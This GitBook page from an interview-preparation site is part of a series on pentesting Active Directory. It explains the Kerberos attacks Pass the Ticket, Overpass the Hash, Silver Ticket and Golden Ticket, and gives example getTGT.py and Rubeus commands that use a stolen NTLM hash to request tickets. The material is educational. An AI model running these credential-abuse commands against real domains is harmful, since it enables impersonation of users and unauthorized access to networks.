Interview Bank
  • Interview Bank
  • Web
    • Persistent Connection and Non Persistent
    • CDN
    • Code Review
    • JWT
      • JWT vs Session Based Authentication
      • JWT Challenge
      • JWE
      • JWS
    • Content Security Policy (CSP)
    • Same-origin Policy (SOP)
    • Cross-Origin Resource Sharing (CORS)
      • Exploiting CORS
    • HTTP Strict Transport Security (HSTS)
    • SQL Injection (SQLi)
    • Password Encryption in Login APIs
    • API Security
      • API Principles
    • Simple bypass PHP
    • Server-side Template Injection (SSTI)
    • Javascript Object and Inheritance
    • HTTP/2
    • Cookie vs Local vs session Storage
    • XML External Entity (XXE)
    • What happened when enter domain name in browser
    • Prototype Pollution - Part 1
    • Prototype Pollution - Part 2
    • Nginx vs Apache
  • OT Security
    • Securing Operational Technology: Understanding OT Security
  • Quantum Computing
    • Quantum Computing: Unveiling the Cryptographic Paradigm Shift
    • Quantum Obfuscation: Shielding Code in the Quantum Era
  • DevSecOps
    • Continuous Integration/Continuous Deployment Pipeline Security
    • Chaos Engineering Overview
      • Security Chaos Engineering
    • Mysql VS redis
    • Kubernetes (k8s)
    • How MySQL executes query
    • REDIS
    • Difference between cache and buffer
  • Windows
    • Pentesting Active Directory - Active Directory 101
    • Pentesting Active Directory - Kerberos (Part 1)
    • Pentesting Active Directory - Kerberos (Part 2)
    • AD vs Kerberos vs LDAP
    • Active Directory Certificate Services Part 1
    • Unconstrained Delegation
    • AS-REP Roasting
    • NTLM Relay via SMB
    • LLMRN
    • Windows lateral movement
    • Constrained Delegation
    • Resource-Based Constrained Delegation
    • IFEO (lmage File Execution Options) Hijacking
  • UNIX
    • Setuid
  • Large Language Models (LLMs)
    • Tokens
    • LangChain
    • Integration and Security
  • Android
    • Keystore
  • Red team development
    • Secure C2 Infrastructure
    • P Invoke in c#
    • D Invoke
    • ExitProcess vs ExitThread
  • Blue Team
    • Indicators of Compromise
    • Methods to prevent Email domain spoofing
    • Windows Prefetching
  • CVE
    • XZ Outbreak CVE-2024-3094
    • Log4J Vulnerability (CVE-2021-44228)
    • SolarWinds Hack (CVE-2020-10148)
    • PHP CGI RCE (CVE-2024-4577)
    • Windows Recall
  • Software Architecture
    • Microservices
    • KVM
  • Docker
    • Overview
    • Daemon Socket
    • Tips to reduce docker size
  • Blockchain
    • Overview
    • Smart Contract
  • Business Acumen
    • Market Research Reports and Perception
    • Understanding Acquisitions
    • Cybersecurity as a Business Strategy
  • Cyber Teams
    • Introduction to Purple Teaming
  • Malware
    • Dynamic Sandbox Limitations
Powered by GitBook
On this page
  • Pass the Ticket
  • Overpass the Hash / Pass the Key
  • Silver Ticket
  • Golden Ticket
  • Interview Question
  • Author
  • References
  1. Windows

Pentesting Active Directory - Kerberos (Part 2)

Part 3 of a hopefully fruitful and long series

Now that we know how Kerberos works, we can move on to learning the various types of attacks. I will mainly discuss attacks related to Kerberos.

The types of attacks we will discuss today are:

  • Pass The Ticket

  • Overpass the Hash / Pass the Key

  • Silver Ticket

  • Golden Ticket

I will probably discuss more attacks in the next part.

Pass the Ticket

In the Pass the Ticket attack, attackers steal a user's authentication ticket. This stolen ticket is used to impersonate the user, gaining unauthorized access to resources and services within a network. It is possible to obtain the ticket via MITM but we also need to get access to the session key. Getting the ticket from thelsass.exe process allows us to get both the ticket and session key. This can be performed with mimikatz.

Overpass the Hash / Pass the Key

This attack is designed for environments where traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. It leverages the NTLM hash or AES key of a user to get Kerberos tickets, enabling unauthorized access to resources within a network. Basically, we are using the user hash to impersonate a specific user. Once we have the user hash, we can impersonate that user against the KDC and gain access to several services. User hashes can be extracted from SAM files in workstations or NTDS.DIT file of DCs or extracted from lsass.exe process memory with Mimikatz. Once we secure the has, we can ask for a TGT which allows an attacker to access services or machines to which the user has permissions. The process can be done with tools such as getTGT.py

python getTGT.py greenhat.com/frost -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7  export KRB5CCNAME=/root/impacket-examples/isaac.ccache

We can also use Rubeus.exe to get TGT.

.\Rubeus.exe asktgt /domain:greenhat.com /user:frost /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7

Silver Ticket

Silver Ticket attack involves the exploitation of service tickets in AD. This method relies on acquiring the NTLM hash of a service account e.g. (a computer account) to forge a TGS ticket. With this forged ticket, an attacker can access specific services on the network. There are many types of services available such as WMI, CIFS, PowerShell Remoting, WinRm etc...

Golden Ticket

The objective of Golden Ticket is to build a TGT ticket. This allows an attacker to impersonate any user through the use of the NTLM hash of the AD krbtgt account. It enables access to any service or machine within the domain as the impersonated user.

Interview Question

  1. As an attacker, is it better to use the NTLM hash or AES Key of a user? Explain Why.

  2. Assuming that the user you created a TGT with changes its password, will your TGT still be valid? Explain why.

  3. What is the difference between a silver ticket and a golden ticket?

  4. How can you detect a golden ticket?

Author

References

PreviousPentesting Active Directory - Kerberos (Part 1)NextAD vs Kerberos vs LDAP

Last updated 12 months ago

Do refer to the types of services

Do refer for more information

here
here
❄️
Isaac
Kerberos (I): How does Kerberos work? - Theory
HackTricks - Pass the Ticket
HackTricks - Overpass the Hash
HackTricks - Silver Ticket
HackTricks - Golden Ticket